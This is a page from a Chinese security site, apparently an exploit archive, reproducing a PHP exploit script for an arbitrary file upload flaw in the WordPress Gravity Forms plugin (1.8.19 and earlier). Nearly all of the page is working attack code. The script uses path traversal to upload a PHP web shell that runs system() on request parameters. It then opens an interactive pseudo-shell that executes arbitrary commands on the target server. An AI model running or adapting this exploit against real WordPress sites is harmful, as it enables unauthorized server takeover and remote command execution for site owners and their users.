首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 WordPress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload 来源：an0nguy @ protonmail.ch 作者：Abk Khan 发布时间：2016-06-20   <?php /****************************************************************************************************************************    *     * Exploit Title        : Gravity Forms [WP] - Arbitrary File Upload     * Vulnerable Version(s): 1.8.19 (and below)     * Write-Up             : https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html     * Coded by             : Abk Khan [ an0nguy @ protonmail.ch ]   * *****************************************************************************************************************************/ error_reporting(0);   echo "    _____                 _ _         ______    _ _       / ____|               (_) |       |  ____|  | | |     | |  __ _ __ __ ___   ___| |_ _   _| |__ __ _| | |___  | | |_ | '__/ _` \ \ / / | __| | | |  __/ _` | | / __|  | |__| | | | (_| |\ V /| | |_| |_| | | | (_| | | \__ \   \_____|_|  \__,_| \_/ |_|\__|\__, |_|  \__,_|_|_|___/                                 __/ |                                                 |___/     > an Exploiter by AnonGuy\n"; $domain    = (@$argv[1] == '' ? 'http://localhost/wordpress' : @$argv[1]); $url       = "$domain/?gf_page=upload"; $shell     = "$domain/wp-content/_input_3_khan.php5"; $separator = '-------------------------------------------------------------------';   $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, '<?php system($_GET[0]); ?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch);   if (strpos($response, '"ok"') !== false) {     echo "$separator\nShell at $shell\n$separator\nSpawning a 'No-Session' Shell . . . Done!\n$separator\n";     while ($testCom != 'exit') {         $user    = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));         $b0x     = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20hostname;%20echo%20'~'"), '~', '~'));         echo "$user@$b0x:~$ ";         $handle  = fopen("php://stdin", 'r');         $testCom = trim(fgets($handle));         fclose($handle);         $comOut  = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";         echo $comOut;     } } else {     die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator"); }   function get_string_between($string, $start, $end) {     # stolen from stackoverflow!     $string = ' ' . $string;     $ini    = strpos($string, $start);     if ($ini == 0)         return '';     $ini += strlen($start);     $len = strpos($string, $end, $ini) - $ini;     return substr($string, $ini, $len); } ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·op5 7.1.9 Configuration Comman ·phpATM 1.32 - Remote Command E ·Regsvr32.exe (.sct) Applicatio ·Skype For Business 2013 User E ·Bomgar Remote Support Unauthen ·WordPress Premium SEO Pack 1.9 ·PHPLive 4.4.8 - 4.5.4 - Passwo ·WordPress Ultimate Product Cat ·Oracle Orakill.exe 11.2.0 - Bu ·Tomabo MP4 Player 3.11.6 - SEH ·Easy RM To MP3 Converter 2.7.3 ·Airia - (Add Content) CSRF   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved